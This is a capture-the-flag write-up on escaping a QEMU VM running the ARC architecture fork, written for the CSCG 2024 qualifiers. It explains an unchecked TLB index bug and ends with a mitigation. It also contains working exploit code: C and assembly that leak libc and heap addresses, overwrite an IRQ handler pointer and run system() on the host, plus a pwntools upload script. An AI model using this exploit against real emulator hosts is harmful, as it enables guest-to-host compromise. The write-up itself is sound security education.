How to pwn a QEMU 0-day

This writeup explains how I solved the Argonauts challenge during the CSCG qualifiers of 2024.

Name: Argonauts
Category: Pwn
Difficulty: Hard
Description: What a lovely emulator. It'd be a shame if anything were to happen to it. (I'm joking. Go break it. Here's the source code.)

In the Argonauts challenge, we are given access to a Linux VM. The VM is started with QEMU. The flag is stored on the host, outside of the VM, and can be obtained by running the /readflag program on the host. The goal of the challenge is to break out of the VM and gain arbitrary code execution on the host.

The QEMU code base is huge. How do you even get started on such a challenge? And how does a VM escape even work? Hopefully, this writeup makes it clear.

If you would like to try the challenge yourself before reading the writeup, you can download the challenge here.

Narrowing Down the Target
Finding the Vulnerability
Exploit Preparations
Leaking the LibC Address
Redirecting Control Flow
Putting It All Together
Mitigation
Summary

Narrowing Down the Target

We start by narrowing down the target. One thing we notice, by inspecting the Dockerfile, is that the VM is started with the following command:

qemu-system-arc -M virt -cpu archs -display none -monitor none -m 2G -kernel /home/ctf/vmlinux -nographic -snapshot -no-reboot

This is a standard way to emulate an operating system with QEMU. The interesting part of this command is the architecture that is emulated. ARC is a CPU family that is mostly used for embedded systems. It is not officially supported by QEMU, but it is implemented in a fork. This also explains the name of the challenge, because ARC was designed by the Argonaut Games company.

Since the QEMU code base is huge, it is unlikely that we have to find a 0-day vulnerability in the general QEMU code base. Instead, the vulnerability is probably specific to the ARC fork. We can figure out what has changed by cloning both the official QEMU repository and the ARC fork and comparing them against each other.

Comparing the commit histories of both repositories reveals the most recent mainline commit that also appears in the ARC fork. We then diff the ARC fork against the official QEMU repository at that commit, that is, right before the fork was made. Apart from some minor changes, most of the new code lives in folders that were created for the ARC architecture. The following folders were added:

/hw/arc
/include/hw/arc
/linux-user/arc
/target/arc
/tests/tcg/arc
/tests/tcg/arc64

The linux-user folder is not relevant to us because the challenge emulates an entire operating system, rather than a single program. The tests folders are also not used. Therefore, the vulnerability has to be either in /hw/arc or in /target/arc.
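
The search for the fork point described above can be sketched in a few lines of Python. This is only an illustration and not the procedure used during the CTF: the helper names commit_hashes and latest_shared_commit are made up for this example, and the sketch assumes that git is installed and that both repositories are cloned locally.

```python
import subprocess

def commit_hashes(repo_path, ref="HEAD"):
    """Return the commit hashes reachable from ref, newest first."""
    out = subprocess.run(
        ["git", "-C", repo_path, "log", "--format=%H", ref],
        check=True, capture_output=True, text=True,
    ).stdout
    return out.split()

def latest_shared_commit(fork_hashes, mainline_hashes):
    """Return the newest fork commit that also exists in mainline, or None."""
    mainline = set(mainline_hashes)
    for commit in fork_hashes:  # walk the fork history from newest to oldest
        if commit in mainline:
            return commit
    return None
```

Calling latest_shared_commit(commit_hashes("qemu-arc"), commit_hashes("qemu")) with the two (hypothetical) clone paths would return the commit to diff against.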

Finding the Vulnerability

Since we have narrowed down the target, we can start looking for vulnerabilities. Arbitrary code execution is usually achieved through memory corruption or general logic flaws such as command injection. The ARC-specific code does not call execve or access the host filesystem, so we probably have to find a memory corruption flaw. Since we are investigating a VM, the flaw might be triggered by a specific sequence of instructions, or through one of the emulated hardware components.

There are various ways to find bugs. My first approach was inspired by a very cool LiveOverflow video. Because we are given shell access to the Linux VM, we can execute arbitrary programs within the VM. I grabbed the ARC ISA reference manual and simply tried to execute all possible instructions, hoping that one of them would crash the emulator. I quickly ran into a bunch of assertion failures, such as this one. Unfortunately, assertion failures cannot be used for arbitrary code execution, so I started to manually analyze the code instead.

In general, it helps to look for unsafe primitives, such as unchecked memcpy calls or fixed-size arrays. Eventually, I stumbled upon the arc_mmu_get_tlb_at_index function. This looks like an unchecked array access:

static struct arc_tlb_e *
arc_mmu_get_tlb_at_index(uint32_t index, struct arc_mmu *mmu)
{
    uint32_t set = index / N_WAYS;
    uint32_t bank = index % N_WAYS;
    return &mmu->nTLB[set][bank];
}

Let's see if it is vulnerable. The above function is called in arc_mmu_aux_set_tlbcmd:

if (val == TLB_CMD_WRITE || val == TLB_CMD_WRITENI) {
    /*
    * TODO: Include index verification. We are always clearing the index as
    * we assume it is always valid.
    */
    tlb = arc_mmu_get_tlb_at_index(mmu->tlbindex & TLBINDEX_INDEX, mmu);
    tlb->pd0 = mmu->tlbpd0;
    tlb->pd1 = mmu->tlbpd1;

    /*
    * don't try to optimize this: upon ASID rollover the entire TLB is
    * unconditionally flushed for any ASID
    */
    tlb_flush_all_cpus_synced(cs);
}
if (val == TLB_CMD_READ) {
    /*
    * TODO: Include index verification. We are always clearing the index as
    * we assume it is always valid.
    */

    tlb = arc_mmu_get_tlb_at_index(mmu->tlbindex & TLBINDEX_INDEX, mmu);
    mmu->tlbpd0 = tlb->pd0;
    mmu->tlbpd1 = tlb->pd1;

    mmu->tlbindex &= ~(TLBINDEX_E | TLBINDEX_RC);
}

The following part of target/arc/mmu.h is also relevant to us:

#define TLBINDEX_INDEX  0x00001fff

#define TLB_CMD_WRITE   0x1
#define TLB_CMD_READ    0x2

#define N_SETS          256
#define N_WAYS          4
#define TLB_ENTRIES     (N_SETS * N_WAYS)

struct arc_tlb_e {
    /*
     * TLB entry is {PD0,PD1} tuple, kept "unpacked" to avoid bit fiddling
     * flags includes both PD0 flags and PD1 permissions.
     */
    uint32_t pd0, pd1;
};

struct arc_mmu {
    uint32_t enabled;

    struct arc_tlb_e nTLB[N_SETS][N_WAYS];

    /* insert uses vaddr to find set; way selection could be random/rr/lru */
    uint32_t way_sel[N_SETS];

    /*
     * Current Address Space ID (in whose context mmu lookups done)
     * Note that it is actually present in AUX PID reg, which we don't
     * explicitly maintain, but {re,de}construct as needed by LR/SR insns
     * respectively.
     */
    uint32_t pid_asid;
    uint32_t sasid0;
    uint32_t sasid1;

    uint32_t tlbpd0;
    uint32_t tlbpd1;
    uint32_t tlbpd1_hi;
    uint32_t tlbindex;
    uint32_t tlbcmd;
    uint32_t scratch_data0;
};

We can write an arbitrary value into mmu->tlbindex, mmu->tlbpd0 and mmu->tlbpd1 with an sr instruction. We can also read them with an lr instruction.

The TLBINDEX_INDEX mask restricts our index a bit. However, because TLBINDEX_INDEX is defined as 0x1FFF and N_WAYS is defined as 4, the highest set number that we can access is 0x1FFF / 4 = 0x7FF (rounded down). The highest valid set number is N_SETS - 1 = 0xFF, so we can index far past the end of the array. Looks like we have found a vulnerability!
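
To double-check the arithmetic, here is a small Python model of the index calculation. It only mirrors the constants and the function shown above; ENTRY_SIZE is derived from the two uint32_t fields of struct arc_tlb_e, and the name tlb_slot is made up for this sketch.

```python
N_SETS = 256
N_WAYS = 4
TLB_ENTRIES = N_SETS * N_WAYS   # 1024 valid entries
TLBINDEX_INDEX = 0x1FFF         # mask applied to the guest-controlled index
ENTRY_SIZE = 8                  # struct arc_tlb_e holds two uint32_t fields

def tlb_slot(index):
    """Mirror arc_mmu_get_tlb_at_index: return (set, bank, byte offset into nTLB)."""
    index &= TLBINDEX_INDEX
    set_ = index // N_WAYS
    bank = index % N_WAYS
    offset = (set_ * N_WAYS + bank) * ENTRY_SIZE
    return set_, bank, offset

max_set, max_bank, max_offset = tlb_slot(0xFFFFFFFF)
array_size = TLB_ENTRIES * ENTRY_SIZE
overshoot = max_offset + ENTRY_SIZE - array_size

print(hex(max_set), max_bank)            # 0x7ff 3
print(hex(array_size), hex(overshoot))   # 0x2000 0xe000
```

In other words, the array itself is 0x2000 bytes large, while the mask lets the guest reach another 0xE000 bytes behind it.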

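The vulnerability that we discovered is very powerful. Every TLB entry is 8 bytes wide (pd0 and pd1), and the valid indices end at TLB_ENTRIES - 1 = 1023, so the indices 1024 through 0x1FFF let us read and write 8 bytes at a time anywhere in the 56 KiB that follow the nTLB array on the heap. To turn this into arbitrary code execution, we have to do two things: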

Leak an address to bypass ASLR.
Overwrite a function pointer to redirect the control flow.

Exploit Preparations

To make it easier to write the exploit, I first started the container locally and installed GDB inside.

In the challenge folder:

sudo docker build . -t argonauts
sudo docker run --privileged --name argonauts -p 1024:1024 argonauts
sudo docker exec -it argonauts /bin/bash

In the docker container:

apt update
apt install gdb

I also had to come up with a way to upload a program to the VM and execute it. The VM does not seem to have internet access, and does not seem to have a text editor installed, but we can write data to a file by using output redirection:

echo data > filename

The shell seems to have a limit of 1024 bytes per command, but we can work around that by sending multiple commands and using the append operator (>>):

echo part1 >> filename
echo part2 >> filename

To avoid problems with binary data, I encoded the program with base64. The following Python script establishes a connection with the container and uploads and executes a program:

from pwn import *
import base64

with open("program.bin", "rb") as f:
    program = f.read()

# Connect and log in
p = remote("localhost", 1024)
p.recvuntil(b"argo login: ")
p.sendline(b"argonaut")

def execute(cmd):
    p.recvuntil(b"$ ")
    p.sendline(cmd.encode())

# Upload the program as base64 (decoded to str so that it can be
# concatenated with the command strings below)
data = base64.b64encode(program).decode()
while data:
    execute("echo " + data[:1000] + " >> data")
    data = data[1000:]

execute("cat data | base64 -d > program") # Decode the program
execute("chmod +x program") # Fix permissions
execute("./program") # Run program

p.interactive()
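
The chunking logic of the upload can also be tested offline, without a connection to the VM. The following sketch is a standalone variant of the loop above; the function name upload_commands and its parameters are made up for this example.

```python
import base64

def upload_commands(payload, filename="data", chunk_size=1000):
    """Split payload into echo commands that append base64 text to filename."""
    encoded = base64.b64encode(payload).decode()
    return [
        f"echo {encoded[i:i + chunk_size]} >> {filename}"
        for i in range(0, len(encoded), chunk_size)
    ]

# Example: a 5120-byte payload is split into several commands
commands = upload_commands(bytes(range(256)) * 20)
print(len(commands), max(len(c) for c in commands))
```

Every echo appends a newline to the file, so the chunks end up on separate lines. This should not matter as long as the decoder ignores newlines, which is an assumption about the base64 tool inside the VM.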

To build a program for the ARC architecture, we also have to install the ARC toolchain on our own machine. Once it is installed, we can build programs with arc-linux-gnu-gcc.

Leaking the LibC Address

A common target for exploits is the system function of libc. To calculate its address, we have to know where libc is located in memory. To find its address, I first wrote a program that dumps the content of the heap:

In exploit.s:

.global read_aux
.global write_aux

read_aux:
    lr r0, [r0]
    j [blink]

write_aux:
    sr r1, [r0]
    j [blink]

In exploit.c:

#include <stdint.h>
#include <stdio.h>

#define AUX_TLBPD0 0x460
#define AUX_TLBPD1 0x461
#define AUX_TLBINDEX 0x464
#define AUX_TLBCOMMAND 0x465

#define TLB_CMD_READ 2

uint32_t read_aux(int id);
void write_aux(int id, uint32_t value);

uint64_t read_tlb(int index) {
    write_aux(AUX_TLBINDEX, index);
    write_aux(AUX_TLBCOMMAND, TLB_CMD_READ);
    uint64_t pd0 = read_aux(AUX_TLBPD0);
    uint64_t pd1 = read_aux(AUX_TLBPD1);
    return pd0 | (pd1 << 32);
}

int main() {
    printf("Running exploit.\n");

    for (int i = 0; i < 0x2000; i++) {
        printf("%i: %llX\n", i, read_tlb(i));
    }

    return 0;
}

We can check whether a dumped value points into libc by comparing it against the memory map of the QEMU process in GDB. This way, I figured out that reading TLB index 6849 yields a libc address that lies 0x2F02C0 bytes above the system function.
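
Comparing thousands of values by hand is tedious, so the comparison can be scripted. The sketch below parses the output format of the dump program and keeps only the values that fall into a given address range. The function names and the addresses in the example are hypothetical; the real range has to be taken from the memory map of the QEMU process.

```python
def parse_dump(lines):
    """Parse 'index: HEXVALUE' lines as printed by the dump loop."""
    entries = {}
    for line in lines:
        index, _, value = line.partition(": ")
        if value:  # skips lines without the separator, such as the banner
            entries[int(index)] = int(value, 16)
    return entries

def pointers_into(entries, start, end):
    """Return {index: value} for all values inside the range [start, end)."""
    return {i: v for i, v in entries.items() if start <= v < end}

# Hypothetical dump excerpt and hypothetical libc mapping
dump = ["Running exploit.", "0: 1234", "1: 7F00001002C0", "2: 0"]
libc_start, libc_end = 0x7F0000000000, 0x7F0000200000
print(pointers_into(parse_dump(dump), libc_start, libc_end))
```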

Redirecting Control Flow

To turn the out-of-bounds access into arbitrary code execution, we have to overwrite a function pointer. In target/arc/cpu.h, we can see that the arc_mmu structure is embedded in a larger structure called CPUArchState:

struct CPUArchState {
    ...

    union {
      struct arc_mmu v3;
      struct arc_mmuv6 v6;
    } mmu;

    ...

    void *irq[256];

    ...
};

Note that there is an array of IRQ pointers after the MMU structure. They are declared as void *, but they actually point to IRQState structures. IRQState is defined in hw/core/irq.c:

struct IRQState {
    Object parent_obj;

    qemu_irq_handler handler;
    void *opaque;
    int n;
};

void qemu_set_irq(qemu_irq irq, int level)
{
    if (!irq)
        return;

    irq->handler(irq->opaque, irq->n, level);
}

Notice that the IRQState structure contains both a function pointer and an argument. This looks like a good target.

Although there may be multiple ways to raise an IRQ, the easiest way is to write an IRQ number into the AUX_ID_aux_irq_hint register:

/* Function implementation for writing the IRQ related aux regs. */
void aux_irq_set(const struct arc_aux_reg_detail *aux_reg_detail,
                 target_ulong val, void *data)
{
    ...
    case AUX_ID_aux_irq_hint:
        qemu_mutex_lock_iothread();
        if (val == 0) {
            qemu_irq_lower(env->irq[env->aux_irq_hint]);
        } else if (val >= NR_OF_EXCEPTIONS) {
            qemu_irq_raise(env->irq[val]);
            env->aux_irq_hint = val;
        }
        qemu_mutex_unlock_iothread();
        break;
    ...
}

Finally, we use GDB to figure out where the IRQState structures are located on the heap. Luckily for us, they are not too far behind the nTLB array. For example, TLB indices 7367 and 7368 allow us to overwrite the handler and the argument (opaque) of the IRQState structure that is used for IRQ 16.
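
Once GDB has shown the address of the nTLB array and the address of a target field, the matching TLB index follows from a simple division by the entry size. The helper below is a sketch of that calculation; the name tlb_index_for and the base address in the example are hypothetical.

```python
ENTRY_SIZE = 8      # one TLB entry (pd0 + pd1) covers one 64-bit host pointer
MAX_INDEX = 0x1FFF  # largest index that survives the TLBINDEX_INDEX mask

def tlb_index_for(target_addr, ntlb_addr):
    """Translate a host address into the TLB index that reads or writes it."""
    offset = target_addr - ntlb_addr
    if offset < 0 or offset % ENTRY_SIZE:
        raise ValueError("target is below nTLB or not 8-byte aligned")
    index = offset // ENTRY_SIZE
    if index > MAX_INDEX:
        raise ValueError("target is out of reach of the 13-bit index")
    return index

# Hypothetical addresses, as they might be printed by GDB
ntlb = 0x555500001000
print(tlb_index_for(ntlb + 7367 * ENTRY_SIZE, ntlb))  # 7367
```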

Now, in order to call the system function with a chosen argument, we:

Use our arbitrary write primitive to write the argument at a known address in memory.
Use our arbitrary write primitive to overwrite irq->opaque and irq->handler with the address of our argument and the address of the system function.
Use the sr instruction to trigger the IRQ handler.
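
The following Python model illustrates why these three steps are enough. It is a simplified simulation and not QEMU code: IRQState is reduced to the three fields that matter, and fake_system is a stand-in for libc's system. The handler is called with three arguments, but system only looks at the first one. On the real target this relies on the calling convention of the host (assumed here to be x86-64 System V), where surplus arguments are simply ignored.

```python
class IRQState:
    """Simplified stand-in for QEMU's IRQState (parent_obj omitted)."""
    def __init__(self, handler, opaque, n):
        self.handler = handler
        self.opaque = opaque
        self.n = n

def qemu_set_irq(irq, level):
    """Same dispatch logic as the C function quoted above."""
    if irq is None:
        return
    irq.handler(irq.opaque, irq.n, level)

executed = []

def fake_system(command, *ignored):
    """Stand-in for system(): only the first argument is used."""
    executed.append(command)

def original_handler(opaque, n, level):
    pass

irq16 = IRQState(original_handler, opaque=None, n=16)

# The two out-of-bounds writes of the exploit, modelled as attribute updates
irq16.handler = fake_system
irq16.opaque = "/readflag"

qemu_set_irq(irq16, 1)  # raising the IRQ calls the overwritten handler
print(executed)         # ['/readflag']
```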

Putting It All Together

We discovered a primitive that allows us to read and write at an arbitrary offset on the heap. We use the arbitrary read primitive to leak the address of libc and the address of the heap. We use the arbitrary write primitive to overwrite an IRQ callback and its argument. We make it point to the system function. Finally, we trigger the IRQ callback by writing to the AUX_ID_aux_irq_hint register.

Here is the exploit code which launches the /readflag program:

#include <stdint.h>

#define AUX_IRQ_HINT 0x201
#define AUX_TLBPD0 0x460
#define AUX_TLBPD1 0x461
#define AUX_TLBINDEX 0x464
#define AUX_TLBCOMMAND 0x465

#define TLB_CMD_WRITE 1
#define TLB_CMD_READ 2

uint32_t read_aux(int id);
void write_aux(int id, uint32_t value);

uint64_t read_tlb(int index) {
    write_aux(AUX_TLBINDEX, index);
    write_aux(AUX_TLBCOMMAND, TLB_CMD_READ);
    uint64_t pd0 = read_aux(AUX_TLBPD0);
    uint64_t pd1 = read_aux(AUX_TLBPD1);
    return pd0 | (pd1 << 32);
}

void write_tlb(int index, uint64_t value) {
    write_aux(AUX_TLBPD0, value & 0xFFFFFFFF);
    write_aux(AUX_TLBPD1, value >> 32);
    write_aux(AUX_TLBINDEX, index);
    write_aux(AUX_TLBCOMMAND, TLB_CMD_WRITE);
}

int main() {
    // Leak libc address
    uint64_t libc_leak = read_tlb(6849);
    uint64_t libc_system = libc_leak - 0x2F02C0;

    // Leak heap address so that we can calculate
    // the address of our argument
    uint64_t irq_ptr = read_tlb(1263);

    // Write "/readflag" on the heap
    write_tlb(7330, 0x616C66646165722F);
    write_tlb(7331, 0x67);

    // Overwrite IRQ handler and argument
    write_tlb(7367, libc_system);
    write_tlb(7368, irq_ptr - 0x100);

    // Trigger the IRQ handler
    write_aux(AUX_IRQ_HINT, 16);
    return 0;
}
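
The two constants that are written to TLB indices 7330 and 7331 are simply the string "/readflag" plus its terminating NUL byte, packed into little-endian 64-bit values. The sketch below shows how to derive them for an arbitrary command. It assumes a little-endian host, which the constants in the exploit imply; the function name pack_qwords is made up for this example.

```python
import struct

def pack_qwords(data):
    """Append a NUL terminator, pad to a multiple of 8 bytes and
    split the result into little-endian 64-bit values."""
    data += b"\x00"                     # C string terminator
    data += b"\x00" * (-len(data) % 8)  # pad to a full 8-byte entry
    return [q for (q,) in struct.iter_unpack("<Q", data)]

print([hex(q) for q in pack_qwords(b"/readflag")])
# ['0x616c66646165722f', '0x67']
```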

Mitigation

The vulnerability can easily be fixed by validating the TLB index before it is used: arc_mmu_get_tlb_at_index must never receive an index of TLB_ENTRIES (1024) or higher. The missing check is even marked as a TODO in the code.
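
A minimal model of such a check is shown below. It is written in Python to illustrate the logic only; the real fix would have to be made in the C code of the fork, and how the emulator should react to an invalid index (ignore the command, raise an exception in the guest, and so on) is left open here. The name checked_tlb_slot is made up for this sketch.

```python
N_SETS = 256
N_WAYS = 4
TLB_ENTRIES = N_SETS * N_WAYS

def checked_tlb_slot(index):
    """Return (set, bank) for a valid index, or None if it is out of range."""
    if index >= TLB_ENTRIES:
        return None
    return index // N_WAYS, index % N_WAYS

print(checked_tlb_slot(1023))  # (255, 3), the last valid entry
print(checked_tlb_slot(7367))  # None, the index used by the exploit
```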

Summary

This section serves as a TL;DR.

The goal is to break out of a QEMU VM and gain arbitrary code execution on the host.
The arc_mmu_get_tlb_at_index function does not validate its index, which gives us a read and write primitive for the heap memory behind the nTLB array.
Using the overflow, we can leak the address of libc and overwrite a function pointer on the heap, along with an argument.
We invoke the overwritten function pointer to call system("/readflag") on the host.